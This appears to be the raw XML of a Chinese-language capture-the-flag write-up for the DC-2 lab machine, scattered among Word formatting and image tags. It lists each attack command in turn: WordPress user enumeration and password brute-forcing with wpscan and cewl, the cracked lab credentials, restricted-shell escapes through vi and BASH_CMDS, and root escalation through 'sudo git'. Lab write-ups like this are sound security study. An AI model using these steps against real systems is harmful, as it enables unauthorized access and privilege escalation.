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9865" cy="4234815"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1905"/>
            <wp:docPr id="5" name="圖片 5" descr="DC-2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DC-2#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有開</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>80,7744 port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9865" cy="2572385"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="4" name="圖片 4" descr="DC-2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DC-2#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搜尋網頁發現</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>flag page有提示這題要用到cewl工具來做wordlist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7960" cy="2753995"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="3" name="圖片 3" descr="DC-2#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DC-2#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慣例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>dirsearch一下，發現是wordpress製作，嘗試登入login.php但缺少username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4310" cy="1842770"/>
            <wp:effectExtent l="0" t="0" r="13970" b="1270"/>
            <wp:docPr id="2" name="圖片 2" descr="DC-2#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DC-2#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wpscan -h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查看命令列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>-e u可以枚舉user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9865" cy="2800985"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="7" name="圖片 7" descr="DC-2#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DC-2#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wpscan --url http://dc-2 -e u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val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>enumerate user發現有admin,jerry,tom三個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3200400" cy="647700"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1" name="圖片 1" descr="DC-2#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DC-2#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cewl http://dc-2/ -m 6 -d 1 -w dc.txt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生成字數長度大於6的字典，深度為1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>(dc-2/../)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>，存成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>dc.txt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wpscan --url http://dc-2 -U dcuser.txt -P dc.txt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用wpscan爆破發現有兩個</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>credential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 xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>jerry</w:t>
      </w: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 xml:space="preserve">, Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>adipiscing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 xml:space="preserve">Username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>tom</w:t>
      </w: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 xml:space="preserve">, Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>parturient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3503295"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1905"/>
            <wp:docPr id="13" name="圖片 13" descr="DC-2#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DC-2#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用</w:t>
      </w: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jerry登入，查看page，有一標題是flag2，內容如上，提示wordpress可能無法攻擊，需找其他entry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1939290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="11430"/>
            <wp:docPr id="12" name="圖片 12" descr="DC-2#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DC-2#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很明顯要用另一個</w:t>
      </w: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credential連線ssh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ssh tom@192.168.205.194 -p 7744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77440" cy="853440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11" name="圖片 11" descr="DC-2#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DC-2#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正要用</w:t>
      </w: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cat local.txt取得flag時發現無法使用此command，因為在rbash內(restriction bash)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compgen -c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先查看rbash內有那些command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118360" cy="1219200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="圖片 10" descr="DC-2#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DC-2#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發現有less,ls,vi，似乎能先簡易查看檔案內容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60320" cy="434340"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="9" name="圖片 9" descr="DC-2#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DC-2#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less local.txt取得local flag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505460"/>
            <wp:effectExtent l="0" t="0" r="3810" b="12700"/>
            <wp:docPr id="17" name="圖片 17" descr="DC-2#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DC-2#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由於需要提權，還是需要完整</w:t>
      </w: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shell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echo $PATH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export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin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查看PATH，發現導致不能用命令的主因，export也無法直接更改，因為是read only</w:t>
      </w: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411480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16" name="圖片 16" descr="DC-2#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DC-2#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red"/>
          <w:lang w:eastAsia="zh-TW"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>方法1</w:t>
      </w:r>
      <w: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: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vi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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:set</w:t>
      </w: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shell=/bin/bash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:shell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export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin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由於/home/tom/usr/bin下的vi (tom)指向/usr/bin/vi (root)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在vi內設置shell參數指向/bin/bash，並執行shell則會啟動一個非限制bash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但$PATH仍同rbash，所以執行export更改同kali path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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red"/>
          <w:lang w:eastAsia="zh-TW"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>方法2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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: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BASH_CMDS[a]=/bin/sh;a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/bin/bash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用bash特有環境變數BASH_CMDS指向/bin/sh並執行a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後面一樣用export更改path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其餘方法可google rbash繞過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如以一來則能正常cat文件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1073150"/>
            <wp:effectExtent l="0" t="0" r="635" b="8890"/>
            <wp:docPr id="20" name="圖片 20" descr="DC-2#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DC-2#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查看flag3.txt內容，提示su jerry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sudo -l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發現jerry能用git binary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1854200"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5080"/>
            <wp:docPr id="19" name="圖片 19" descr="DC-2#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DC-2#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https://gtfobins.github.io/gtfobins/git/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google /usr/bin/git exploit，有漏洞command可以使用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sudo git -p help config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!/bin/sh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17520" cy="746760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="圖片 18" descr="DC-2#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DC-2#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id確定user為root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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成功取得proof flag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643AA"/>
    <w:rsid w:val="061E37A2"/>
    <w:rsid w:val="0FA36DFA"/>
    <w:rsid w:val="1DBC6A9C"/>
    <w:rsid w:val="2B5D2861"/>
    <w:rsid w:val="34B946BC"/>
    <w:rsid w:val="40AF20B3"/>
    <w:rsid w:val="40EC2310"/>
    <w:rsid w:val="45EB7193"/>
    <w:rsid w:val="48D50EE8"/>
    <w:rsid w:val="4B153A09"/>
    <w:rsid w:val="4E815F88"/>
    <w:rsid w:val="4FF82E05"/>
    <w:rsid w:val="51FF417D"/>
    <w:rsid w:val="59F232D8"/>
    <w:rsid w:val="5C517DA8"/>
    <w:rsid w:val="5DAE1482"/>
    <w:rsid w:val="5DBE2AD2"/>
    <w:rsid w:val="62A005EE"/>
    <w:rsid w:val="665E3C8F"/>
    <w:rsid w:val="6BB34A27"/>
    <w:rsid w:val="6C5F0C91"/>
    <w:rsid w:val="6CCC0901"/>
    <w:rsid w:val="719D39E7"/>
    <w:rsid w:val="72CD0A9C"/>
    <w:rsid w:val="75220869"/>
    <w:rsid w:val="7B5A3617"/>
    <w:rsid w:val="7D334C0C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ACER</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-10T15:51:02Z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